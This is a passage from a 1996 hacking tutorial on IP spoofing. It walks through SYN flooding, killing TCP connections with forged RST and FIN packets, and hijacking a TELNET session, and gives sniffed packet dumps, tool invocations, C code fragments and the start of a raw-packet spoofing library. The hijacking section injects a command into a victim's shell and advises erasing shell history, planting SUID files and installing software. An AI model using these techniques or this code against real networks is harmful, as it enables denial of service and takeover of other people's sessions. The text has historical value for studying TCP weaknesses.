  7085.        18'. I won't waste much time on it.
  7086.        
  7087.        Setup:
  7088.                  host A <-----][----------X--------------->host B
  7089.                                           | 
  7090.                  host S <-----------------/   
  7091.        
  7092.        Concept:
  7093.        Host S impersonates SYN (connection init) coming from host A, to host B. 
  7094.        Host A should be unreachable (e.g. turned off, non existant,...).
  7095.        B sends out the second packet of the 3 way TCP handshake. Host B will now 
  7096.        wait for response of host A.
  7097.        If host A is reachable it will tell host B (with a reset: RST) that it DID NOT 
  7098.        inititate a connection, and thus host B received a bogus packet. (In that case
  7099.        host B will ingnore the SYN, and *normally* nothing will happen)
  7100.        So if A is unreachable, B will wait for response some time.
  7101.        When doing multiple attacks, the backlog of host B is going to be exceeded 
  7102.        and host B will not except new connections (read on TCP bugs for 
  7103.        additional features ;) for some time.
  7104.        
  7105.        4.3 Connection Killing
  7106.        ----------------------
  7107.        
  7108.        Setup:
  7109.                  host A <------X------------------------->host B
  7110.                                |      A,B have a TCP connection running
  7111.                  host S <------/      A,S on same subnet
  7112.        
  7113.                  (setup is the same in both cases)
  7114.        
  7115.        Use:
  7116.        Clearing mudders of your net, annoying that dude typing an important 
  7117.        paper, etc... plain fun.
  7118.        
  7119.        4.3.1 Using reset (RST)
  7120.        -----------------------
  7121.        
  7122.        Concept:
  7123.        TCP packets have flags which indicate the status of the packet, like RST. 
  7124.        That is a flag used to reset a connection. To be accepted, only the 
  7125.        sequence number has to be correct (there is no ACK in a RST packet).
  7126.        So we are going to wait for packets in a connection between A and B. 
  7127.        Assume we wait for packets to A. We will calculate (from B's packets)
  7128.        the sequence number for A's packets (from B's ACK's), and fire a bogus RST 
  7129.        packet from S (faking to be A) to B.
  7130.        
  7131.        An actual attack:
  7132.        (These are real sniffed packets, although IP numbers of hosts were changed)
  7133.        host A : 166.66.66.1
  7134.        host B : 111.11.11.11
  7135.        (S on same subnet as A)
  7136.        
  7137.        (This is a good example of how things not always go as you want, see 
  7138.        below for a solution) 
  7139.        1) connection running...
  7140.           we wait for a packet to get current SEQ/ACK (A->B)
  7141.        
  7142.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
  7143.           SEQ (hex): 57E1F2A6   ACK (hex): B8BD7679
  7144.           FLAGS: -AP---   Window: 3400
  7145.           (data removed because irrelevant, 2 bytes data)
  7146.        
  7147.        2) This is the ACK of it + included data (witch causes SEQ number to 
  7148.           change, and thus messing up our scheme, because this came very fast.)
  7149.           (B->A) 
  7150.        
  7151.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  7152.           SEQ (hex): B8BD7679   ACK (hex): 57E1F2A8
  7153.           FLAGS: -AP---   Window: 2238
  7154.           (data removed because irrelevant, 2 bytes data)
  7155.        
  7156.        3) ACK of it. (A->B) 
  7157.        
  7158.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
  7159.           SEQ (hex): 57E1F2A8   ACK (hex): B8BD767B
  7160.           FLAGS: -A----   Window: 3400
  7161.           (data removed because irrelevant)
  7162.        
  7163.        4) further data (B->A)
  7164.        
  7165.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  7166.           SEQ (hex): B8BD767B   ACK (hex): 57E1F2A8
  7167.           FLAGS: -AP---   Window: 2238
  7168.           (data removed because irrelevant)
  7169.        
  7170.        5) ACK of it (A->B)
  7171.        
  7172.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23
  7173.           SEQ (hex): 57E1F2A8   ACK (hex): B8BD7691
  7174.           FLAGS: -A----   Window: 3400
  7175.        
  7176.        6) Now we get 2 RST packets. How do you explain that? Well, the first reset 
  7177.           packet has been buffered somewhere on our system, because the ethernet 
  7178.           segment was busy when we wanted to send it. This is the 'unexpected 
  7179.           thing' I discussed above, here we are lucky, the data stream cooled down 
  7180.           so fast.
  7181.           When it doesn't cool down so fast, we could miss our RST (or the 
  7182.           connection will be killed a little later then when we wanted), you'll see 
  7183.           some idea's on how to fix that problem.
  7184.        
  7185.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  7186.           SEQ (hex): B8BD7679      FLAGS: ---R--
  7187.        
  7188.        
  7189.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810
  7190.           SEQ (hex): B8BD7691      FLAGS: ---R--
  7191.           (This was the packet that killed the connection)
  7192.        
  7193.        Discussion of the program:
  7194.        
  7195.        The discussion here is a bit weird , that is because 'sniper-rst.c' is 
  7196.        not designed to be an optimal killer, merly to be an example.
  7197.        We have the problem of speed here. We miss some packets what causes those 
  7198.        resends. So we would design a better 'sniper' if we do the following:
  7199.                - use blocking IO (not necessarilly, because the RST killer would 
  7200.                                  loose some of it's beauty (looping), this is dealt 
  7201.                                  with in the FIN killer example. Blocking is a 
  7202.                                  little faster when a lot of packets come after 
  7203.                                  each other.)
  7204.                - multi-packet firing... fire more packets with incremented SEQ. 
  7205.                  (this is commented in the source) 
  7206.                - waiting for a pure ACK packet (no data), because otherwise you 
  7207.                  risk to much of getting mid transmission and not being fast enough.
  7208.                  (disadvantage is the 'waiting period' before the connection is 
  7209.                  killed)         
  7210.        
  7211.        NOTE these examples were done on non-loaded networks, with non-loaded 
  7212.             servers, what makes it a worst case scenario for speed problems.
  7213.        
  7214.        4.3.2 Closing a connection (FIN)
  7215.        --------------------------------
  7216.        
  7217.        Concept:
  7218.        An other flag is FIN and says: "no more data from sender".
  7219.        This flag is used when closing a connection down the normal legit way. So 
  7220.        if there was a way to make a packet that is accepted by one of the two 
  7221.        hosts, this host would believe the 'sender' didn't have any data left.
  7222.        Following (real) packets would be ignored as they are considered bogus.
  7223.        That's it, because we can sniff the current SEQ/ACK of the connection we 
  7224.        can pretend to be either host A or B, and provide the other host with 
  7225.        CORRECT packetinformation, and an evil FIN flag.
  7226.        The beauty of it all is, that after a FIN is send the other host always 
  7227.        replies with one if it is accepted, so we have a way to verify our 
  7228.        killing, and can be 100% sure of success (if for some reason we missed a 
  7229.        SEQ or ACK, we can just resend).
  7230.        RST killing is more popular and is prefered, but I've put this in as an 
  7231.        example, and I like it myself.
  7232.        
  7233.        
  7234.        An actual attack:
  7235.        (These are real sniffed packets, although IP numbers of hosts were changed)
  7236.        host A : 166.66.66.1
  7237.        host B : 111.11.11.11
  7238.        (S on same subnet as A)
  7239.        
  7240.        1) connection is running....
  7241.           sniper is started on host S as 'sniper-fin 166.66.66.1 23 111.11.11.11 1072' 
  7242.           and waits for a packet to take action (we need to get SEQ/ACK)
  7243.           (mind you switching host A and B would be the same, only S would be 
  7244.            impersonating A instead of B)
  7245.           suddenly a packet arrives... (A->B)
  7246.        
  7247.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  7248.           SEQ (hex): 19C6B98B   ACK (hex): 69C5473E
  7249.           FLAGS: -AP---   Window: 3400
  7250.        Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  7251.         45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3
  7252.         9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E >
  7253.         50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A .
  7254.                                                 ~~~~~~~~~ > 2 data bytes
  7255.        
  7256.        2) sniper detected it, and sends a bogus packet. (S as B -> A)
  7257.           We calculate our SEQ as: ACK of (A->B) packet
  7258.           We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet
  7259.                                    (19C6B98B + 2 = 19C6B98D)
  7260.           (so we tell A, we received the last packet, and will not transmit 
  7261.           further data)
  7262.        
  7263.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
  7264.           SEQ (hex): 69C5473E   ACK (hex): 19C6B98D
  7265.           FLAGS: -A---F   Window: 7C00
  7266.           (data removed because irrelevant)
  7267.        
  7268.        3) host A now says: 'okay, you end the session, so here is my last data'
  7269.           (A->B)
  7270.        
  7271.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  7272.           SEQ (hex): 19C6B98D   ACK (hex): 69C5473E
  7273.           FLAGS: -AP---   Window: 3400
  7274.           (data removed because irrelevant)
  7275.        
  7276.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  7277.           SEQ (hex): 19C6B998   ACK (hex): 69C5473F
  7278.           FLAGS: -A----   Window: 3400
  7279.           (data removed because irrelevant)
  7280.        
  7281.        4) host A now has flushed its buffer and on his turn FIN's the connection.
  7282.           (A->B)
  7283.           sniper, intercepts this packet and now knows the hosts fell for the 
  7284.           spoof and the killing was a success!
  7285.           (host A will no longer accept any data)
  7286.        
  7287.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  7288.           SEQ (hex): 19C6B998   ACK (hex): 69C5473F
  7289.           FLAGS: -A---F   Window: 3400
  7290.           (data removed because irrelevant)
  7291.        
  7292.        5) We impersonated B, making A believe we had no further data. But B 
  7293.           doesn't know that and continues to send packets.
  7294.           (B->A)
  7295.           host A has that connection closed, and thus thinks the real packets of 
  7296.           B are spoofed (or at least bogus)! So host A sends some reset packets 
  7297.           (RST).
  7298.        
  7299.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23
  7300.           SEQ (hex): 69C5473E   ACK (hex): 19C6B98D
  7301.           FLAGS: -A----   Window: 3750
  7302.           (data removed because irrelevant)
  7303.        
  7304.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072
  7305.           SEQ (hex): 19C6B98D      FLAGS: ---R--
  7306.           (data removed because irrelevant)
  7307.        
  7308.        6) This goes on for a couple of packets.
  7309.        
  7310.        
  7311.        Discussion of the program (numbers correspond with those of 'An Actual 
  7312.        Attack'):
  7313.        
  7314.        1) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
  7315.           if(stat==-1)  {printf("Connection 10 secs idle... timeout.\n");exit(1);}
  7316.         
  7317.           We use wait_packet on a non blocking socket. This way we can enable a 
  7318.           10 seconds timeout. This functions returns when the correct packet 
  7319.           has been delivered (or timeout).
  7320.        
  7321.        2) sp_seq=pinfo.ack;
  7322.           sp_ack=pinfo.seq+pinfo.datalen;
  7323.           transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
  7324.                                                              sp_seq,sp_ack,ACK|FIN);
  7325.        
  7326.           We calculate a spoofed SEQ/ACK, and fire off a fake FIN packet. As we 
  7327.           don't send any data with it, our buffer is set to NULL and datalength 
  7328.           to 0.
  7329.           NOTE together with FIN, you need to enable ACK.
  7330.        
  7331.        3) N/A
  7332.        
  7333.        4) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
  7334.           if(stat>=0)
  7335.                {printf("Killed the connection...\n");
  7336.                exit(0);}
  7337.        
  7338.           We wait for a FIN packet (note the FIN in wait_packet). We use a 5 
  7339.           sec. timeout, if the function returns and stat>=0 (-1 on timeout), we 
  7340.           know our attempt was successfull.
  7341.        
  7342.        5) N/A
  7343.        
  7344.        6) N/A
  7345.        
  7346.        NOTE We can have the same problem here as with the RST killer. But didn't 
  7347.             have it here, because the packet we responded upon was the end of a 
  7348.             data stream (in fact it was an echo from a shell command)
  7349.        
  7350.        4.3.3 Improving 
  7351.        ---------------
  7352.        
  7353.        Except from multipacket firing, it is advised to launch 2 attacks (one in 
  7354.        both ways). This illiminates one side oriented connections to be handled 
  7355.        optimally. I think of things like downloading data, which is a one way 
  7356.        data-flow, it is much easier sending a RST from the (spoofed) receiver to 
  7357.        the sender, then the other way around.
  7358.        Those 2 attacks could both impersonate host A and B, and thus giving is 4 
  7359.        times more chance of a succesfull kill.
  7360.        I'll leave further experimenting up to you (use your imagination to handle 
  7361.        different situations).
  7362.        
  7363.        4.4 Connection Hijacking
  7364.        ------------------------
  7365.        Setup:
  7366.                  host A <------X------------------------->host B
  7367.                                |      A,B have a TCP connection running (TELNET)
  7368.                  host S <------/      A,S on same subnet
  7369.        
  7370.        Concept:
  7371.        (suppose a TELNET from A (client) to B (server))
  7372.        TCP separates good and bogus packets by their SEQ/ACK numbers i.e. B 
  7373.        trusts the packets from A because of its correct SEQ/ACK numbers. 
  7374.        So if there was a way to mess up A's SEQ/ACK, B would stop believing A's 
  7375.        real packets.
  7376.        We could then impersonate to be A, but using correct SEQ/ACK numbers 
  7377.        (that is numbers correct for B).
  7378.        We would now have taken over the connection (host A is confused, B thinks 
  7379.        nothings wrong (almost correct, see 'actual attack'), and S sends 
  7380.        'correct' data to B). 
  7381.        This is called 'Hijacking' a connection. (generally hijacking a TELNET session,
  7382.        but same could be done woth FTP, RLOGIN, etc...)
  7383.        How could we mess up A's SEQ/ACK numbers? Well by simply inserting a data 
  7384.        packet into the stream at the right time (S as A->B), the server B would 
  7385.        accept this data, and update ACK numbers, A would continue to send 
  7386.        it's old SEQ numbers, as it's unaware of our spoofed data. 
  7387.        
  7388.        Use: 
  7389.        I allready hear you wiseguys yelling: "Hey dude, why hijack a connection 
  7390.        if you can sniff those packets anyway??"
  7391.        Well, anybody heared of One Time Passwords, Secure Key?? Case closed.... 
  7392.        (S/Key: server challenges client, client and server calculate a code from 
  7393.        the challenge and password, and compare that code. The password itself is 
  7394.        never send on the cable, so you can't sniff sh!t).
  7395.        (OTP: server has a list of passwords, once one is used, it is destroyed, 
  7396.        so sniffing gets you a password that has 'just' expired ;)
  7397.        (ALL types of identification that happen at connection (encrypted or not, 
  7398.        trusted or not), and don't use encrypted data transfer, are vulnerable to 
  7399.        'hijacking'.)
  7400.        
  7401.        An actual attack:
  7402.        (These are real sniffed packets, although IP numbers of hosts were changed)
  7403.        (suppose a TELNET from A (client) to B (server))
  7404.        host A : 166.66.66.1
  7405.        host B : 111.11.11.11
  7406.        (S on same subnet as A)
  7407.        
  7408.        1) connection running... 
  7409.           we look with sniffit, and see he's busy in a shell, we start 'hijack' 
  7410.           on host S as 'hijack 166.66.66.1 2035 111.11.11.11'
  7411.           a packet containing from (A->B) is detected... hijack takes action...
  7412.           (A->B)
  7413.        
  7414.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  7415.           SEQ (hex): 5C8223EA   ACK (hex): C34A67F6
  7416.           FLAGS: -AP---   Window: 7C00
  7417.        Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  7418.         45 E 00 . 00 . 29 ) CA . F3 . 40 @ 00 . 40 @ 06 . C5 . 0E . 9D . C1 . 45 E 3F ?
  7419.         9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EA . C3 . 4A J 67 g F6 .
  7420.         50 P 18 . 7C | 00 . 6D m 29 ) 00 . 00 . 6C l
  7421.                                                 ~~~~
  7422.        
  7423.        2) host B (server) echo's that databyte (typing 'l' in a bash shell!!!)
  7424.           (you gotta know what you are doing)
  7425.           (B->A)   
  7426.        
  7427.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  7428.           SEQ (hex): C34A67F6   ACK (hex): 5C8223EB
  7429.           FLAGS: -AP---   Window: 2238
  7430.        Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  7431.         45 E 00 . 00 . 29 ) B5 . BD . 40 @ 00 . FC . 06 . 1E . 44 D 9D . C1 . 2A * 0B .
  7432.         9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F6 . 5C \ 82 . 23 # EB .
  7433.         50 P 18 . 22 " 38 8 C6 . F0 . 00 . 00 . 6C l
  7434.                                                 ~~~~
  7435.        
  7436.        3) A simple ACK from host A to B responding to that echo. Because we know 
  7437.           this can come, and we know a simple ACK doesn't contain data, we don't 
  7438.           need this for SEQ/ACK calculation.
  7439.        
  7440.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  7441.           SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
  7442.           FLAGS: -A----   Window: 7C00
  7443.           (data removed because irrelevant)
  7444.        
  7445.        4) Now we impersonate further data (following packet 1). (S as A -> B)
  7446.           We calculate SEQ/ACK out of packet 1, NOT out of the 'echo' from B, 
  7447.           because we have to be as fast as possible, and packet 2 could be slow.
  7448.           We send some backspaces and some enters. To clean up the command line.
  7449.           We will probably still get some error message back from the shell.
  7450.           But we handle that too! (see sourcecode)
  7451.        
  7452.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  7453.           SEQ (hex): 5C8223EB   ACK (hex): C34A67F6
  7454.           FLAGS: -AP---   Window: 7C00
  7455.        Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  7456.         45 E 00 . 00 . 32 2 31 1 01 . 00 . 00 . 45 E 06 . 99 . F8 . 9D . C1 . 45 E 3F ?
  7457.         9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EB . C3 . 4A J 67 g F6 .
  7458.         50 P 18 . 7C | 00 . AE . F5 . 00 . 00 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 08 .
  7459.         0A . 0A .
  7460.        
  7461.        5) This is the echo of our spoofed data. Look at ACK. (B->A)
  7462.           5C8223F5 = 5C8223EB + 0A (this is how we detect that the spoof was a 
  7463.           success)   
  7464.           NOTE that at this point the connection is ours, and A's SEQ/ACK 
  7465.                numbers are completely f#cked up according to B.   
  7466.        
  7467.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  7468.           SEQ (hex): C34A67F7   ACK (hex): 5C8223F5
  7469.           FLAGS: -AP---   Window: 2238
  7470.        Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  7471.         45 E 00 . 00 . 3C < B5 . BE . 40 @ 00 . FC . 06 . 1E . 30 0 9D . C1 . 2A * 0B .
  7472.         9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F7 . 5C \ 82 . 23 # F5 .
  7473.         50 P 18 . 22 " 38 8 26 & 7C | 00 . 00 . 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H
  7474.         5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 0D . 0A . 0D . 0A .
  7475.        
  7476.        6) Hijack will now try to get on track of SEQ/ACK numbers again, to send 
  7477.           the data we want to be executed.
  7478.           NOTE each time a packet 'out of numbering' arrives the host should 
  7479.                answer with correct SEQ/ACK, this provides us with the certainty 
  7480.                that a lot of packets are going to be send with correct (and not 
  7481.                changing) SEQ/ACK nrs. (this is where the mechanism of getting our 
  7482.                numbers back straight is based upon) 
  7483.           NOTE it's at this point the real TELNET client's session hangs, most 
  7484.                people ignore this and re-login after a few secs, accepting the 
  7485.                accident as Murphy's law.
  7486.                (Well it *can* happen without any spoofing involved)
  7487.        
  7488.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  7489.           SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
  7490.           FLAGS: -AP---   Window: 7C00
  7491.           (data removed because irrelevant)
  7492.        
  7493.        
  7494.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  7495.           SEQ (hex): C34A680B   ACK (hex): 5C8223F5
  7496.           FLAGS: -A----   Window: 2238
  7497.           (data removed because irrelevant)
  7498.        
  7499.        
  7500.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23
  7501.           SEQ (hex): 5C8223EB   ACK (hex): C34A67F7
  7502.           FLAGS: -AP---   Window: 7C00
  7503.           (data removed because irrelevant)
  7504.        
  7505.        
  7506.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  7507.           SEQ (hex): C34A680B   ACK (hex): 5C8223F5
  7508.           FLAGS: -A----   Window: 2238
  7509.           (data removed because irrelevant)
  7510.        
  7511.        7) We are back on track (or at least hijack is, because this is going 
  7512.           very fast). And we fire off our faked bash command.
  7513.        
  7514.            echo "echo HACKED" >> $HOME/.profile<ENTER>
  7515.        
  7516.        TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23
  7517.           SEQ (hex): 5C8223F5   ACK (hex): C34A680B
  7518.           FLAGS: -AP---   Window: 7C00
  7519.        Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23
  7520.         45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E 3F ?
  7521.         9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J 68 h 0B .
  7522.         50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20   22 " 65 e 63 c
  7523.         68 h 6F o 20   48 H 41 A 43 C 4B K 45 E 44 D 22 " 20   3E > 3E > 24 $ 48 H 4F O
  7524.         4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e 0A . 00 .
  7525.        
  7526.        8) now we wait for this data to be confirmed.
  7527.           ACK = 5C8223F5 + 025 (=37 bytes)
  7528.        
  7529.        TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040
  7530.           SEQ (hex): C34A680B   ACK (hex): 5C82241A
  7531.           FLAGS: -AP---   Window: 2238
  7532.        Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040
  7533.           (data removed because irrelevant)
  7534.        
  7535.        9) The connection runs on. Now you can execute more commands (just stay 
  7536.           on track of SEQ/ACK), and even finnish the connection (with the same  
  7537.           mechanism of sniper, or with sniper itself... here FIN is recommended).
  7538.           NOTE: here it is important to be in a shell. But if you have been 
  7539.                 watching someone, and you notice he's always directly going to 
  7540.                 'pine' and you can't get inbetween on time.
  7541.                 NO PROBS.... just make a cleanup string that cleans up 
  7542.                 'pine' and puts you back in the shell. (some control chars, 
  7543.                 hotkeys, whatever....)
  7544.           NOTE: if you clean up the .sh_history of .bash_history (whatever) this 
  7545.                 attack is one of the nicest there is. Another advantage above 
  7546.                 sniffing.
  7547.           NOTE: Noone says you have to make a .rhosts file (rlogin and 
  7548.                 family might be disabled), you can change permissions, put 
  7549.                 stuff SUID, put it public, install stuff, mail, etc.. 
  7550.        
  7551.        Discussion of the program (numbers correspond with those of 'An Actual 
  7552.        Attack'):
  7553.        
  7554.        1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);
  7555.        
  7556.           Waiting for actual data (PSH is always used for packets containing 
  7557.           data in interactive services like TELNET)
  7558.        
  7559.        2) N/A
  7560.        
  7561.        3) N/A
  7562.        
  7563.        4) sp_seq=attack_info.seq+attack_info.datalen;
  7564.           sp_ack=attack_info.ack;
  7565.           transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,
  7566.                                                             23,sp_seq,sp_ack,ACK|PSH);
  7567.        
  7568.           We recalculate the sequence number (using SEQ and datalength of packet 1)
  7569.           an we send a spoofed packet with ACK and PSH flag, containing the 
  7570.           cleanup data in to_data.
  7571.        
  7572.        5) while(count<5)
  7573.                {
  7574.                wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
  7575.                if(attack_info.ack==sp_seq+sizeof(to_data))
  7576.                        count=PERSONAL_TOUCH;
  7577.                else count++;
  7578.                };
  7579.        
  7580.           We wait for a confirmation that our spoofed sequence is accepted. We 
  7581.           expect a packet with an ACK set (PSH or not). It should come within 5  
  7582.           packets, we use this limit, because we should be able to handle some 
  7583.           previous ACK packets!
  7584.           NOTE we don't check SEQ nrs, because we have no clue of what they are 
  7585.                going to be (data might have been send our way, or not).
  7586.        
  7587.        6) while(count<10)
  7588.                {
  7589.                old_seq=serv_seq;
  7590.                old_ack=serv_ack;
  7591.                wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, 
  7592.                                                                             ACK,0);
  7593.                if(attack_info.datalen==0)
  7594.                  {
  7595.                  serv_seq=attack_info.seq+attack_info.datalen;
  7596.                  serv_ack=attack_info.ack;
  7597.                  if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
  7598.                        count=PERSONAL_TOUCH;
  7599.                  else count++;
  7600.                  }
  7601.                };
  7602.        
  7603.           To get back on track, we try to receive 2 ACK packets without data 
  7604.           with the same SEQ/ACK. We know enough packets will be send as a 
  7605.           response to incorrect packets from the confused host A.
  7606.           This is how we get back on track. 
  7607.           NOTE In a case where A completely gave up, simple spoof a packet with 
  7608.                incorrect SEQ/ACK to get the correct numbers back.
  7609.        
  7610.        7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P,
  7611.                                              SERVER,23,serv_ack,serv_seq,ACK|PSH);
  7612.        
  7613.           Pretty clear....
  7614.        
  7615.        8) while(count<5)
  7616.                {
  7617.                wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
  7618.                if(attack_info.ack==serv_ack+sizeof(evil_data))
  7619.                        count=PERSONAL_TOUCH;
  7620.                else count++;
  7621.                };
  7622.        
  7623.           and again waiting for confirmation.
  7624.        
  7625.           NOTE after the above attack, hijack had produced the following output:
  7626.        
  7627.           Starting Hijacking demo - Brecht Claerhout 1996
  7628.           -----------------------------------------------
  7629.        
  7630.           Takeover phase 1: Stealing connection.
  7631.             Sending Spoofed clean-up data...
  7632.             Waiting for spoof to be confirmed...
  7633.           Phase 1 ended.
  7634.        
  7635.           Takeover phase 2: Getting on track with SEQ/ACK's again
  7636.             Server SEQ: C34A680B (hex)    ACK: 5C8223F5 (hex)
  7637.           Phase 2 ended.
  7638.        
  7639.           Takeover phase 3: Sending MY data.
  7640.             Sending evil data.
  7641.             Waiting for evil data to be confirmed...
  7642.           Phase 3 ended.                                 
  7643.         
  7644.        4.5 Other
  7645.        ---------
  7646.        
  7647.        This list is far from complete, I'm sure you can think of other nice things 
  7648.        to do with this information, think, experiment and code!
  7649.        
  7650.        
  7651.        5. The source code
  7652.        ------------------
  7653.        
  7654.        ---=[ spoofit.h ]=------------------------------------------------------------
  7655.        /**************************************************************************/
  7656.        /* Spoofit.h - Include file for easy creating of spoofed TCP packets      */
  7657.        
  7658.        /*             Requires LINUX 1.3.x (or later) Kernel                     */
  7659.        /*             (illustration for 'A short overview of IP spoofing')       */
  7660.        /*             V.1 - Copyright 1996 - Brecht Claerhout                    */
  7661.        /*                                                                        */
  7662.        /*  Purpose - Providing skilled people with a easy to use spoofing source */
  7663.        /*            I used it to be able to write my tools fast and short.      */
  7664.        /*            Mind you this is only illustrative and can be easily        */
  7665.        /*            optimised.                                                  */ 
  7666.        /*                                                                        */
  7667.        /*  Author - Brecht Claerhout <Coder@reptile.rug.ac.be>                   */
  7668.        /*           Serious advice, comments, statements, greets, always welcome */
  7669.        /*           flames, moronic 3l33t >/dev/null                             */
  7670.        /*                                                                        */
  7671.        /*  Disclaimer - This file is for educational purposes only. I am in      */
  7672.        /*               NO way responsible for what you do with this file,       */
  7673.        /*               or any damage you or this file causes.                   */
  7674.        /*                                                                        */
  7675.        /*  For whom - People with a little knowledge of TCP/IP, C source code    */
  7676.        /*             and general UNIX. Otherwise, please keep your hands of,    */
  7677.        /*             and catch up on those things first.                        */
  7678.        /*                                                                        */
  7679.        /*  Limited to - Linux 1.3.X or higher.                                   */
  7680.        /*               If you know a little about your OS, shouldn't be to hard */
  7681.        /*               to port.                                                 */
  7682.        /*                                                                        */ 
  7683.        /* Important note - You might have noticed I use non standard packet      */
  7684.        /*                  header struct's. How come?? Because I started like    */
  7685.        /*                  that on Sniffit because I wanted to do the            */
  7686.        /*                  bittransforms myself.                                 */
  7687.        /*                  Well I got so damned used to them, I keep using them, */
  7688.        /*                  they are not very different, and not hard to use, so  */
  7689.        /*                  you'll easily use my struct's without any problem,    */
  7690.        /*                  this code and the examples show how to use them.      */ 
  7691.        /*                  my apologies for this inconvenience.                  */
  7692.        /*                                                                        */
  7693.        /* None of this code can be used in commercial software. You are free to  */
  7694.        /* use it in any other non-commercial software (modified or not) as long  */
  7695.        /* as you give me the credits for it. You can spread this include file,   */
  7696.        /* but keep it unmodified.                                                */
  7697.        /*                                                                        */
  7698.        /**************************************************************************/
  7699.        /*                                                                        */
  7700.        /* Easiest way to understand this library is to look at the use of it, in */
  7701.        /* the example progs.                                                     */
  7702.        /*                                                                        */
  7703.        /**** Sending packets *****************************************************/
  7704.        /*                                                                        */ 
  7705.        /* int open_sending (void)                                                */ 
  7706.        /*   Returns a filedescriptor to the sending socket.                      */
  7707.        /*   close it with close (int filedesc)                                   */
  7708.        /*                                                                        */ 
  7709.        /* void transmit_TCP (int sp_fd, char *sp_data,                           */
  7710.        /*                    int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,  */
  7711.        /*                    char *sp_source, unsigned short sp_source_port,     */ 
  7712.        /*                    char *sp_dest,unsigned short sp_dest_port,          */ 
  7713.        /*                    unsigned long sp_seq, unsigned long sp_ack,         */ 
  7714.        /*                    unsigned short sp_flags)                            */ 
  7715.        /*   fire data away in a TCP packet                                       */
  7716.        /*    sp_fd         : raw socket filedesc.                                */ 
  7717.        /*    sp_data       : IP options (you should do the padding)              */
